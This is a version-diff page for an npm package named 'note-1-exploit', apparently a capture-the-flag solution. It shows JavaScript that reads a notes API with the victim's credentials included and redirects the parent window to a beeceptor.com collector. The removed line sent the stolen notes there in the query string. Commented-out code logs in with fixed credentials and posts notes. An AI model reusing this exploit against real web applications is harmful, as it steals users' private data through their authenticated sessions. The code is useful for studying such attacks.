npm - note-1-exploit - Versions diffs - 1.0.18 → 1.0.19 - Mend

note-1-exploit 1.0.18 → 1.0.19

Files changed (2) hide show

package/index.js +52 -16
package/package.json +1 -1

package/index.js CHANGED Viewed

@@ -1,27 +1,63 @@
 async function exploit() {
     let all_results = await fetch("http://web/api/notes/all", {
+        "headers": {
+            "accept": "*/*",
+            "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
+            "sec-gpc": "1"
+        },
+        "referrer": "http://127.0.0.1:10082/",
+        "referrerPolicy": "strict-origin-when-cross-origin",
+        "body": null,
         "method": "GET",
         "mode": "cors",
         "credentials": "include"
     }).then(res => res.text());
     // let json_results = await all_results.json();
     // let note_name = (Math.random() + 1).toString(36).substring(7);
-    window.parent.location.replace("https://omniman.free.beeceptor.com?q=" + all_results)
-    // window.parent.location.replace("https://omniman.free.beeceptor.com?q=" + json_results[0].id)
-    await fetch("http://web/login", {
-        "body": "username=nnnddd&password=nnnddd",
-        "method": "POST",
-        "redirect": "follow",
-        "credentials": "include"
-    });
-    await fetch("http://web/login", {
-        "body": "username=nnnddd&password=nnnddd",
-        "method": "POST",
-        "mode": "cors",
-        "redirect": "follow",
-        "credentials": "include"
-    });
-    // await fetch("http://web/api/notes", {
+    window.parent.location.replace("https://omniman.free.beeceptor.com?q=hahahaha")
+    // await fetch("http://127.0.0.1:10082/login", {
+    //     "headers": {
+    //         "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/127.0.0.1:10082p,image/apng,*/*;q=0.8",
+    //         "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
+    //         "cache-control": "max-age=0",
+    //         "content-type": "application/x-www-form-urlencoded",
+    //         "sec-gpc": "1",
+    //         "upgrade-insecure-requests": "1"
+    //     },
+    //     "referrer": "http://127.0.0.1:10082/login",
+    //     "referrerPolicy": "strict-origin-when-cross-origin",
+    //     "body": "username=nnnddd&password=nnnddd",
+    //     "method": "POST",
+    //     "mode": "cors",
+    //     "redirect": "follow",
+    //     "credentials": "include"
+    // });
+    // await fetch("http://127.0.0.1:10082/login", {
+    //     "headers": {
+    //         "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/127.0.0.1:10082p,image/apng,*/*;q=0.8",
+    //         "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
+    //         "cache-control": "max-age=0",
+    //         "content-type": "application/x-www-form-urlencoded",
+    //         "sec-gpc": "1",
+    //         "upgrade-insecure-requests": "1"
+    //     },
+    //     "referrer": "http://127.0.0.1:10082/login",
+    //     "referrerPolicy": "strict-origin-when-cross-origin",
+    //     "body": "username=nnnddd&password=nnnddd",
+    //     "method": "POST",
+    //     "mode": "cors",
+    //     "redirect": "follow",
+    //     "credentials": "include"
+    // });
+    // await fetch("http://127.0.0.1:10082/api/notes", {
+    //     "headers": {
+    //         "accept": "*/*",
+    //         "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
+    //         "content-type": "application/json",
+    //         "sec-gpc": "1"
+    //     },
+    //     "referrer": "http://127.0.0.1:10082/",
+    //     "referrerPolicy": "strict-origin-when-cross-origin",
     //     "body": "{\"title\":\"" + note_name + "\",\"content\":\"" + json_results[0].id + "\"}",
     //     "method": "POST",
     //     "mode": "cors",

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "note-1-exploit",
-  "version": "1.0.18",
+  "version": "1.0.19",
   "description": "give me the flag",
   "main": "index.js",
   "scripts": {